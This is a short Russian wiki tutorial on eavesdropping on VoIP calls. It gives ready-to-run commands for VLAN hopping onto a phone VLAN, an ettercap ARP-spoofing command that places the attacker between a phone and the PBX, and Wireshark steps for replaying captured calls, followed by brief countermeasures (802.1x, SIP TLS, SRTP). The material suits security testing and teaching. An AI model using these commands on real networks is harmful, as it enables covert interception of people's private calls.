VoIP-sniffing

Материал из Xgu.ru

Автор: Сергей Бондаренко

ARP-spoofing для прослушивания VoIP звонков.

Содержание 1 VLAN-hoping 2 ARP-sppofing 3 Wireshark 4 Методы предотвращения

[править] VLAN-hoping

Переходим в VLAN где находятся телефоны:

sudo ifconfig vlan150 create 
sudo ifconfig vlan150 inet 172.16.150.172 netmask 255.255.255.0 vlan 150 vlandev en0

[править] ARP-sppofing

Делаем ARP-spoofing телефона (172.16.150.11) и IP PBX (172.16.150.1) :

sudo ettercap -i vlan150 -T -M arp -L etterlog /172.16.150.11/ /172.16.150.1/

[править] Wireshark

1. Start a new live capture -> select en0 -> sniff -> stop sniff

2. Telephony -> VoIP Calls -> select a call -> press Player

[править] Методы предотвращения

Использовать 802.1x, SIP TLS и SRTP.

IP-телефония
Основы	PCM  • Дискретизация  • Квантование  • Компандирование (ulaw, alaw)  • Теорема Найквиста  • Кодек  • IP-телефония  • Протоколы IP-телефонии  • Голосовая почта  • IVR  • Конференция  • Gatekeeper  • DID  • Диалплан  • Музыка на удержании  • Эхоподавление  • Перехват звонка  • Парковка вызова  • Запись разговора  • Очереди звонков  • Callback  • Перевод звонка  • Исходящий звонок  • Запись голосовых файлов  • Звонок на группу  • Отправка факсов
Традиционная телефония	PSTN  • DTMF  • SS7 (SCCP)  • FXO  • FXS  • T1  • E1  • PRI  • GSM
Кодеки	G.711  • G.726  • G.729  • GSM  • iLBC  • Speex
Телефонные номера	E.164 • e164.org • ENUM • DUNDi
Протоколы	IAX • H.323 • IAX2 • SIMPLE • SIP • STUN • RSVP • RTP • SCTP • SRTP • MGCP • Skinny (Cisco) • UNIStim (Nortel)
Транспорт и QoS	IP • QoS (Linux, Cisco) • MPLS • LSP • Asterisk QoS
Софтфоны	X-Lite • Zoiper • Twinkle • Ekiga (GnomeMeeting) • KPhone • pjsua • Linphone • Skype
Обработка голоса	Festival • LumenVox
Учёт и биллинг	CDR • Биллинг звонков через Asterisk
Серверы телефонии	Asterisk • GnuGK • OpenH323 • H323plus • sipXecs
Диагностика / Защита	VoIPER  • VoIP-sniffing (прослушивание)
Asterisk	Инсталляция Asterisk  • Инсталляция Asterisk из исходников  • Начальная конфигурация Asterisk  • Digium • AGI • AMI • FOP • zaptel • DAHDI • ztdummy • Adhearsion • AEL • Asterisk Lua  • Русификация • База данных • GSM-шлюз • Управление ОС  • Шифрование звонков  • SIP-транк
Конфигурационные файлы Астериска	extensions.conf • iax.conf • rtp.conf • sip.conf • voicemail.conf • zapata.conf • zaptel.conf